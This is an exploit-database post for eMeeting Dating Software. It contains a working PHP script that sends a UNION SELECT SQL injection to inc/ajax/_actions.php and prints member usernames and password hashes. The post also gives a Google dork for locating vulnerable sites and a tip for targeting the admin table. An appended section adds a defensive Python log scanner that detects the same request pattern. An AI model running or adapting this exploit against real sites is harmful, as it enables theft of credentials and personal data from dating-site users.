A SQL injection vulnerability has been found in eMeeting Dating Software.
Where the SQL injection occurs, how the vulnerability is used, and the finder's own notes on it are given below.
[+] Site : 1337day.com
[+] Support e-mail : submit[at]1337day.com
I'm DaOne member from Inj3ct0r Team
##########################################
# Exploit Title: eMeeting Dating Software SQL Injection Exploit
# Date: 2013-1-14
# Author: DaOne aka Mocking Bird
# Home: 1337day Inj3ct0r Exploit Database
# Software Link: http://datingscripts.co.uk/
# Category: webapps/php
# Price: $155
# Google dork: "Powered by eMeeting LLC"
# Tested on: version 9 & 10
##########################################
# Exploit:
<?php
if($_SERVER['argv'][1] && $_SERVER['argv'][2]){
$host=$_SERVER['argv'][1];
$path=$_SERVER['argv'][2];
$spos=strpos($host, "http://");
if(!is_int($spos)&&($spos==0)){
$host="http://$host";
}
if(!$host=="http://localhost"){
$spos=strpos($host, "http://www.");
if (!is_int($spos)&&($spos==0)){
$host="http://www.$host";
}
}
$sql="inc/ajax/_actions.php?action=PopLinkedField&lid=1+union+select+concat(0x3e,username,'::',password)+from+members--"; # note: you can change table to "members_admin" if not found admin pass!
echo"exploiting...\n";
$source=file_get_contents($host.$path.$sql) or die('403 Forbidden..... Server has a Security');
$user=GetBetween($source,"this.value, >","::");
echo "username: $user\n";
$pass=GetBetween($source,"$user::",",>");
echo"hash: $pass\n";
}
else{
echo"\n\n";
echo"Usage: php ".$_SERVER['argv'][0]." [host] [path] \n";
echo"Example: php ".$_SERVER['argv'][0]." http://www.site.com /path/ \n";
echo"\n\n";
}
function GetBetween($content,$start,$end){
$r = explode($start, $content);
if (isset($r[1])){
$r = explode($end, $r[1]);
return $r[0];
}
return '';
}
?>
# greetz to: all Libyans hax0r5
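For defenders, the request in the advisory has a fixed shape (inc/ajax/_actions.php, action=PopLinkedField, a lid parameter), so web access logs can be checked for it. The following is an added example, not part of the original advisory or the vendor's code: it flags requests to that endpoint whose decoded lid is not a plain integer. It assumes lid is a numeric record id and that logs are in Common/Combined Log Format; the sample lines, IPs and the /dating/ path are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint, action and parameter names come from the advisory's request string.
ENDPOINT = "/inc/ajax/_actions.php"
ACTION = "PopLinkedField"
# Client IP, request target and status of a Common/Combined Log Format line.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample lines (documentation IP ranges, hypothetical install path).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Feb/2013:10:00:01 +0000] "GET /dating/inc/ajax/_actions.php?action=PopLinkedField&lid=7 HTTP/1.1" 200 512',
    "198.51.100.23 - - [01/Feb/2013:10:00:05 +0000] \"GET /dating/inc/ajax/_actions.php?action=PopLinkedField&lid=1+union+select+concat(0x3e,username,'::',password)+from+members-- HTTP/1.1\" 200 734",
    '198.51.100.23 - - [01/Feb/2013:10:00:09 +0000] "GET /dating/inc/ajax/_actions.php?action=PopLinkedField&lid=1%20UNION%20SELECT%201 HTTP/1.1" 403 199',
    '192.0.2.11 - - [01/Feb/2013:10:01:00 +0000] "GET /dating/index.php?lid=abc HTTP/1.1" 200 1024',
]

def suspicious_lid(target):
    """Return the decoded lid if the target hits the endpoint with a non-integer lid, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith(ENDPOINT):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes '+' and %xx
    if ACTION not in params.get("action", []):
        return None
    for lid in params.get("lid", []):
        # Assumption: a legitimate lid is a short decimal record id.
        if not re.fullmatch(r"\d{1,10}", lid):
            return lid
    return None

def scan(lines):
    """Return (client_ip, http_status, decoded_lid) for every flagged log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        lid = suspicious_lid(m.group("target"))
        if lid is not None:
            hits.append((m.group("ip"), int(m.group("status")), lid))
    return hits

if __name__ == "__main__":
    for ip, status, lid in scan(SAMPLE_LOG):
        print(f"{ip} status={status} lid={lid!r}")
```

A flagged request that returned 200 deserves more attention than one answered with 403, since the status shows whether the application processed it.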
